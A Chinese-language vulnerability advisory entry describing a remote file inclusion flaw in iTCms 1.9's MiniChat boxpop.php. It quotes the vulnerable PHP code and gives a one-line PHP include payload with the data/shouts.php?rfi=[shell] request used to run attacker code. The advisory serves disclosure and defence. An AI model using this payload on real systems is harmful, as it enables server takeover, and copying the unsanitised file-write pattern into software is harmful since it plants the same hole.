漏洞信息详情
iTCms boxpop.php远程文件包含漏洞
漏洞简介
iTCms是由意大利人开发的开源内容管理系统。
iTCms实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器执行任意命令。
iTCms的box/MiniChat/boxpop.php文件中没有正确地验证shout参数的输入便写入到了Web可访问的文件:
if ($_POST[\"shout\"]!=\"\")
$shout = $_POST[\'\'shout\'\'];
} else if ($_GET[\"shout\"]!=\"\"){ $shout = $_GET[\"shout\"];
}[...]
$shout = trim($shout);
$shout = stripslashes($shout);
$shout = str_replace (\"\r\n\", \" [br] \", $shout);
$shout = first($shout);[...]$FileName=\"data/shouts.php\"
fwrite($FilePointer,\"$name|^|$shout|^|$date|^|$time|^|$_SERVER[REMOTE_ADDR]|^|\n\");
fclose($FilePointer);
因此远程攻击者可以在$shout变量中包含类似于<?php include($_GET[\'\'rfi\'\']); ?>的代码执行data/shouts.php?rfi=[shell]。
漏洞公告
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.itcms.it/index.php/nav=Home.01
参考网址
来源: XF
名称: itcms-boxpop-file-include(42172)
链接:http://xforce.iss.net/xforce/xfdb/42172
来源: BID
名称: 29028
链接:http://www.securityfocus.com/bid/29028
来源: MILW0RM
名称: 5532
链接:http://www.milw0rm.com/exploits/5532
来源: SECUNIA
名称: 30059
链接:http://secunia.com/advisories/30059
受影响实体
- Itcms Itcms:1.9<!--2000-1-1-->
补丁
暂无
还没有评论,来说两句吧...